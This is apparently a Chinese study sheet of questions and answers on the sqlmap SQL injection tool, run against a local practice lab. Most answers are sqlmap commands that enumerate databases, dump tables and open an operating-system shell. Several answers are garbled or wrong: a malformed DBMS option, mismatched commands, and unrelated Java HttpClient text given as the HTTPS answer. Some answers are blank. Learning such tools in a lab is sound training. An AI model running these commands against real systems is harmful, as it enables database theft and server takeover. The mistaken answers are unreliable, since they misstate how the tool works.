SQLmap Check
- 简单的探测服务器的主机信息,以及数据库的信息
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” --dbs
- 已知网站的数据库为Mysql数据库,使用什么命令会更快捷
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” --dbsmysql
- 查看当前数据库的名称
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –current -dbs
- 查看当前数据库有哪些表
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –D security --tables
- 查看当前数据库user表,并且以明文的方式展示
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” -D security -T users –columns
- 已知Cookie信息,如何使用它,并且获取Shell会话
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –os-shell
- 猜想某个URL可能存在Cookie注入,使用什么命令探测
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” -level=2
- 猜想某个URL可能存在Referer注入,使用什么命令探测
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –level>=3
- 探测一个URL由于某种原因出现超时情况,如何将SQLmap默认时间限制加大
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –time-sec=3000
- 某次探测,由于是白盒测试,为了节省时间,需要加大扫描线程数,使用哪条指令
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –thread 10
- 某次测试过程,发现网站对【'】做了过滤,导致SQLmap加载Payload的时候出错,请问使用哪条指令,可以使SQLmap加载Payload的时候对该过虑进行绕过
答:
- 测试的请求为POST请求,参数为user,id,需要使用哪条指令
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –data=”user=1&id=2&submit=Submit” --dbs
- 测试过程由于节约时间,所有的SQLmap使用过程中弹出的选择指令时,都选择其默认选项,这种情况应该使用哪条指令
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –dbs --batch
- 测试过程,由于需要扫描多个URL,这时会将所有的URL 放在url.txt文件,如何使用该文件
答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/
Less-1/?id=1” –D security –T users –C -dump
- 如果请求是HTTPS时,需要加哪个参数
答:(1) 使用最多的是UrlEncodedFormEntity类。通过该类创建的对象可以模拟传统的HTML表单传送POST请求中的参数。
(2) 除了传统的application/x-www-form-urlencoded表单,我们另一个经常用到的是上传文件用的表单,这种表单的类型为 multipart/form-data。在HttpClient程序扩展包(HttpMime)中专门有一个类与之对应,那就是 MultipartEntity类。此类同样实现了HttpEntity接口。
以下部分为开卷,答完后尽可能记住
- --union-char该指令的含义,以及使用场景
答:–union-char=UCHAR 用于暴力猜解列数的字符
- --delay指令的含义,以及使用场景
答:–delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒
- --safe-url指令的含义,以及使用场景
答:–safe-url=SAFURL 在测试过程中经常访问的url地址
- sqlmap -v指令的含义,具体有哪几个后缀选项
答:-v 0-6 详细级别
-v VERBOSE 详细级别:0-6(默认为1)
- --param-del 指令的含义,以及具体使用方法
答:
- --user-agent,--random-agent两个指令的含义,以及使用情景
答:–user-agent=AGENT 指定 HTTP User – Agent头
--random-agent 构造随机的user-agent
–random-agent 使用随机选定的HTTP User – Agent头
- --auth-type,--auth-cred两个指令的含义,以及使用情景
答:–auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
–auth-cred=ACRED HTTP身份验证凭据(用户名:密码)
- --tamper指令的含义,以及使用情景
答:–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
- --risk指令的含义,以及使用情景
答:–risk=RISK 执行测试的风险(0-3,默认为1)
- --os-cmd,--os-shell两个指令的含义,以及使用情景
答:–os-cmd=OSCMD 执行操作系统命令
–os-shell 交互式的操作系统的shell
- SQLmap与Meterpreter联合使用
答: